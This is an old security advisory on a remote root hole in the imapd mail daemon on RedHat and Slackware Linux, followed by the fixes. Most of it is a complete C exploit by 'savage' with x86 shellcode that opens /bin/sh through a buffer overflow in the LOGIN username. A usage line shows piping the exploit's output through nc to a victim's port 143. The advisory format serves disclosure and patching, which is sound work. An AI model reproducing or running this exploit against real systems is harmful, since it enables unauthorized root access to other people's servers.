COMMAND

    imapd

SYSTEMS AFFECTED

    Linux (RedHat), Slackware 3.2

PROBLEM

    Linux  Systems  running  the  imapd  server daemon can be remotely
    exploited in a way  that an attacker can  gain root access to  the
    system  by  changing  the  root  password  field  to  being blank.
    Exploit  for  RedHat  follows.   Slackware  installs  imap  if you
    choose to install the pine/pico package.

    /*
     * IMAPd   Linux/intel  remote   xploit  by    savage@apostols.org
     * 1997-April-05
     * Workz fine against RedHat and imapd distributed with pine
     * Special  THANKS to:  b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and  the
     * rest of ToXyn !!!
     * usage:
     *     $ (imap 0; cat) | nc victim 143
     *             |
     *             +--> usually from -1000 to 1000 ( try in steps of  100 )
     *             [ I try 0, 100 and 200 - so1o ]
     */

    #include <stdio.h>

    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh";

    char username[1024+255];

    void main(int argc, char *argv[]) {
            int i,a;
            long val;

            if(argc>1)
                    a=atoi(argv[1]);
            else
                    a=0;

            strcpy(username,shell);

            for(i=strlen(username);i<sizeof(username);i++)
                    username[i]=0x90; /* NOP */

            val = 0xbffff501 + a;

            for(i=1024;i<strlen(username)-4;i+=4)
            {
                    username[i+0] = val & 0x000000ff;
                    username[i+1] = (val & 0x0000ff00) >> 8;
                    username[i+2] = (val & 0x00ff0000) >> 16;
                    username[i+3] = (val & 0xff000000) >> 24;
            }

            username[ sizeof(username)-1 ] = 0;

            printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
    }

SOLUTION

    Users of Red Hat  4.0 should apply the  Red Hat 4.1 fix.  Users of
    previous  releases  of  Red  Hat  Linux are strongly encouraged to
    upgrade  or  simply  not  run  imap.  You can remove imap from any
    machine running  with Red  Hat Linux  2.0 or  later by running the
    command "rpm -e imap", rendering them immune to this problem.

    All of the  new packages are  PGP signed with  Red Hat's PGP  key,
    and may be obtained from ftp.redhat.com:/updates/4.1.

    Slackware users should upgrade your software.